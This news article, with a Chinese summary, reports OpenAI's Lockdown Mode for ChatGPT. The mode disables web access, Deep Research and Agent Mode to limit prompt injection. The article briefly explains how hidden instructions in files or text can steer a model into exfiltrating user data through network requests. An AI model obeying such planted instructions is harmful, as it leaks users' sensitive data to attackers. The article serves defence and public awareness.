ChatGPT新Lockdown Mode禁用网页访问、Deep Research和Agent Mode，防范提示注入攻击

2026-06-07 17:44·9天前·Matthias Bastian

AI 摘要

OpenAI为ChatGPT推出Lockdown Mode，可禁用网页访问、Deep Research和Agent Mode，增加通过提示注入攻击窃取数据的难度。该模式并未完全阻止此类攻击，仅阻断数据外泄链的最后一步。提示注入问题仍未解决。

原文 · 未翻译

ChatGPT's new Lockdown Mode lets you disable web access and more to protect sensitive data from prompt injection

Key Points

OpenAI has released a new "Lockdown Mode" for ChatGPT that disables functions such as web access, deep research, and agent mode to protect users from potential data theft.

The feature blocks all connections to the internet and external services, preventing sensitive data from being leaked during conversations with the AI.

Users can activate Lockdown Mode in the security settings and temporarily disable it for individual conversations when broader functionality is needed.

With the new Lockdown Mode, ChatGPT users can disable web access, Deep Research, and Agent Mode to better protect themselves against data theft through prompt injection attacks. The feature is aimed primarily at users handling sensitive data.

Lockdown Mode restricts all features that connect ChatGPT to the internet or external services. The goal is to prevent attackers from using prompt injections, hidden instructions embedded in text or files, to manipulate the model's behavior and exfiltrate sensitive user data. OpenAI says the feature is designed for individuals and organizations working with particularly sensitive data.

Live web search gets limited to cached content, which means search results may be outdated or unavailable entirely. Deep Research and Agent Mode are fully disabled. ChatGPT can no longer download files and won't display web images in regular responses. Network access for Canvas-generated code is blocked too.

Prompt injection remains an unsolved problem

OpenAI calls prompt injection a "frontier, challenging research problem" it's working to solve. That's true, but only part of the story: prompt injections have been a well-known LLM vulnerability since at least GPT-3, frequently exploited, and years of research still haven't produced a fix.

Lockdown Mode confirms that status quo: it's a band-aid, not a fix for prompt injections. It builds on existing defenses, including sandboxing, URL-based exfiltration protection, monitoring, and access controls. But a manipulative instruction hidden in an uploaded file can still influence the model's behavior and lead to wrong answers, OpenAI says. The mode only blocks the final step in an exfiltration chain, the attempt to send data to an attacker via network requests.

OpenAI's FAQ states that prompt injection "is not currently a major risk," but the impact "could grow as attackers develop more sophisticated methods." Lockdown Mode doesn't guarantee complete protection. That's something you might want to keep in mind before linking your financial data into ChatGPT.

Users can toggle the mode off per chat

For personal accounts and self-managed ChatGPT Business accounts, Lockdown Mode can be enabled under "Settings > Security." In managed workspaces, admins can set up the mode through role-based access controls (RBAC) for individual members or groups.

Users can temporarily turn off Lockdown Mode for specific chats when they need full functionality for a particular conversation. Lockdown Mode and Developer Mode are mutually exclusive, though.

For apps and connectors, OpenAI draws distinctions by account type. On personal accounts, Lockdown Mode allows connectors that access already-synced data but blocks live access, write actions, and finance and shopping features. In managed workspaces, OpenAI recommends admins only enable trusted apps and evaluate each one's exfiltration risk individually.

AI News Without the Hype – Curated by Humans

OpenAI产品更新安全/对齐

The Decoder：AI News（RSS）